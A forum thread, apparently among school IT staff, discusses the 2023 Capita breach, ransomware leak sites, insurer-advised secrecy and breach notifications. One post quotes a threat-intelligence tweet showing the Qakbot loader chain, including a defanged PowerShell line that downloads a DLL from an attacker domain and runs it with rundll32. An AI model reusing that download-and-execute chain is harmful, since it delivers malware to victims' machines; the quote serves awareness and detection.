Jump to content

Capita - potential cyber attack cripples outsourcer


Recommended Posts

  • 2 weeks later...
Posted
Looks to me like they might have phished one user and have exfiltrated what that user was doing - on the Vice Society and other ransomware gangs websites, if you go onto their school data a lot of it is just a phish of one user - they'll post that user's e-mails, documents, and any shared drives they may have access to - but it's obvious they have only phished one user as there is no list of user home folders etc on their darkweb sites. Of course even a phish of just 1 user can be devastating if our CP person got hit it would maybe reach Welsh national news! It's my worst nightmare worse than having a car accident!
Posted

Having been on the other side, your cyber insurance and their appointed legal advisors etc advise to not say certain things. Some of the advice seems a bit sketchy to me but transparency is apparently not high in the agenda :(

 

Capita’s directors also have a duty to protect the business and leaving them selves wide open for legal action isn’t a good thing.

 

Personally I’d prefer transparency - they ARE victims here. But there are still people would would exploit that situation.

 

Dammit, that almost sounds like I’m defending Capita!

Posted

The Register is re-reporting that the ransomware gang are starting to sell off access to the data allegedly stolen during the Capita incident: https://www.theregister.com/2023/04/18/capita_breach_gets_worse/

 

The only new piece of information presented is that as of Tuesday, Capita still have not confirmed whether or not the data on offer is from their incident, which really is just confirming the status is unchanged since last week.

 

Unless it turns out either the data on offer is not from the Capita incident, or that there is an operation afoot to contain the breached data, seize the infrastructure and arrest the responsible criminals, I can't imagine that any of their customers will be at all happy in the way Capita are handling it.

Posted
Pretty difficult for Capita's customers to report data breaches while Capita doesn't publish details. Are schools supposed to monitor "the dark web" for information that might have come from their pupils or staff records?
Posted
It's my worst nightmare worse than having a car accident!

At the end of the day its not really your fault. If someone really wanted to hack a specific school or business they probably could. Think how that one user that clicks on the phishing email must feel, knowing they gave hacker access.

 

I once had a chat with a head about this and the stress it would cause IT and her answer was, has anyone died? If not then do what you can but don't stress about it. I remind myself of those words whenever the stress creeps back in :-)

  • Thanks 1
  • 2 weeks later...
Posted

How it all started... :eek:

 

https://twitter.com/GossiTheDog/status/1654904616054849536

 

Here is the Qakbot campaign that hit Capita, as caught by @pr0xylife the day before entry at Capita.

 

Black Basta are using entry via web placements - for example, fake browser updates in malvertising — follow @Cryptolaemus1 for tracking.

 

#Qakbot - BB20 - .zip > .js > ps > .dll

 

wscript rem.js

powershell $chr = ("hxxps://amazonneon[.]com / YDPjgv0 / Fd49a7")

foreach ($ca in $chr) {try {Invoke-WebRequest $ca $env:TEMP\NonfactiousUnbale.dll

rundll32 $env:TEMP\NonfactiousUnbale.dll,GL70

 

IOCs

https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB20_20.03.2023.txt

  • 2 weeks later...
Posted
MyWife got and email off Capita saying they had breached her data in the USS pension scheme with a link for a free check from an equifax service. She did join USS after the date they said was initially safe and not breached.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now



×
×
  • Create New...